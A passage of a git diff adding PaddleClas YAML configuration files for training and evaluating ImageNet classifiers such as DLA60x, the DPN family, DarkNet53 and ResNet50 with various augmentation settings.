b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA60x.yaml new file mode 100644 index 0000000..1de82f5 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA60x.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DLA60x + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA60x_c.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA60x_c.yaml new file mode 100644 index 0000000..646e972 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA60x_c.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DLA60x_c + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN107.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN107.yaml new file mode 100644 index 0000000..92c1fb8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN107.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DPN107 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN131.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN131.yaml new file mode 100644 index 0000000..3cb22f6 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN131.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DPN131 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN68.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN68.yaml new file mode 100644 index 0000000..ecd2d85 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN68.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DPN68 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN92.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN92.yaml new file mode 100644 index 0000000..c431efc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN92.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DPN92 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN98.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN98.yaml new file mode 100644 index 0000000..9fb1ec9 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN98.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DPN98 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DarkNet/DarkNet53.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DarkNet/DarkNet53.yaml new file mode 100644 index 0000000..b69ccfc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DarkNet/DarkNet53.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DarkNet53 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_AutoAugment.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_AutoAugment.yaml new file mode 100644 index 0000000..a00968a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_AutoAugment.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Baseline.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Baseline.yaml new file mode 100644 index 0000000..603dfec --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Baseline.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Cutmix.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Cutmix.yaml new file mode 100644 index 0000000..918a762 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Cutmix.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - CutmixOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Cutout.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Cutout.yaml new file mode 100644 index 0000000..5a60a76 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Cutout.yaml @@ -0,0 +1,131 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + 